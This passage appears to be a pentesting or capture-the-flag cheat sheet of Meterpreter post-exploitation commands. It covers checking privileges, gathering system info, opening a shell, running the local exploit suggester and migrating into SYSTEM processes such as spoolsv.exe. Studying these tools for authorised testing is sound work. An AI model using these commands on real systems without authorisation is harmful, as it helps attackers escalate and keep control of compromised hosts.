- β‘οΈ See if you are root and your privileges
meterpreter> getuid
Windows: NT AUTHORITY\SYSTEM
- β‘οΈ Learn more about the system. Here with Windows, you could look for CVEs given the build version. The architecture can help too, as some scripts are less useful on some architectures.
meterpreter> sysinfo
Computer : XXX-PC
OS : Windows X (... Build xxx...).
Architecture : x64
- β‘οΈ Start a shell:
sh/bash
on Linux, cmd
on Windows
meterpreter> shell # start a shell
C:\WINDOWS\system32> # Windows cmd
- β‘οΈ Ask for suggested exploits. β οΈ Before running them, migrate to a stable process with the highest privilege you can have.
meterpreter> run post/multi/recon/local_exploit_suggester
- β‘οΈ Load a local file
commands.txt
with meterpreter commands
meterpreter> resource commands.txt
- β‘οΈ π Migrate to another process π. This is something as some services/stuff need us to be "in" a process that has the same architecture, and the same permissions, that our target. Usually, any process run by "NT AUTHORITY\SYSTEM"/root should be okay, although you may have to try a few times.
meterpreter> ps # list process
meterpreter> migrate process_pid # move to another process
meterpreter> migrate -N process_name # same
meterpreter> # most used ones
meterpreter> migrate -N spoolsv.exe # can restart so good
meterpreter> migrate -N explorer.exe # screenshots...